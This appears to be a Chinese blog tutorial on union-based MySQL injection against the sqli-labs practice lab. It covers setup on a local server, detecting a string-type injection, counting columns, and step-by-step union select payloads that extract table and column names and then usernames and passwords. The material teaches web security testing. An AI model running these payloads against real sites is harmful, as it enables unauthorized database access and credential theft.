mysql注入联合查询

环境搭建

下载复现漏洞的包

mysql注入联合查询_第1张图片

下载小皮面板
将下载好的文件解压在小皮面板的phpstudy_pro\WWW路径下

将这个文件phpstudy_pro\WWW\sqli-labs-php7-master\sql-connections\db-creds.inc

中的密码更改为小皮面板中的密码

mysql注入联合查询_第2张图片

选择php版本
mysql注入联合查询_第3张图片
在小皮中启动nginx和数据库
使用环回地址访问

mysql注入联合查询_第4张图片

先判断是什么类型的注入
使用id=2-1和id=1,如果两者结果相同则为字符型否则为数字类
mysql注入联合查询_第5张图片mysql注入联合查询_第6张图片

id=1后面加'或"查看报错

使用后发现返回值为mysql的报错
使用id=' --+
mysql注入联合查询_第7张图片

发现结果和id=1一致说明我们第一次使用 ' 时使mysql语句中多了个 ' 第二次使用--+说明输入的单引号与前面的id=1形成了一个闭合,因此可以判断注入类型为字符型,闭合方式为单引号

我们要对字段数进行判断

id=1' order by 1 --+    可以使用二分大法
mysql注入联合查询_第8张图片

找到准确的列数后可以用union进行查询了,比如列数是3
id=1' union select 1,2,3 limit 1,1 --+  或者
id=-1' union select 1,2,3 --+
联合查询的输出是严格按照顺序进行的,因此当id=1存在时会在第0行输出第一个sql语句查询到的结果,输入的数字就到了下一行而 limit 1,2的作用为从第num1行开始显示num2行内容
我们可以看到2,3被输出了,说明这两个位置都可以作为回显点
也可以不用limit语句,只需让前面sql语句查询结果为空
mysql注入联合查询_第9张图片

然后就可以开始爆库名了

id=-1' union select 1,database(),3 --+
database()显示当前库名称   也可以使用group_concat() 将所有内容写入一行并输出
mysql注入联合查询_第10张图片

爆表名

id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
查找数据库中security库下的所有表名

payload:information_schema是mysql自带的库,记录了该数据库所有的表名和字段名
mysql注入联合查询_第11张图片

显然users十分关键
看字段名
id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

查询数据库security下表users中的所有字段
mysql注入联合查询_第12张图片

同理username与password看起来非常重要

进去看看

id=-1' union select 1,group_concat(username,0x3a,password),3 from security.users --+

查询security库中users表中字段username与password的所有信息
0x3a为16进制  意思是 ‘ :’

mysql注入联合查询_第13张图片

你可能感兴趣的:(mysql,数据库)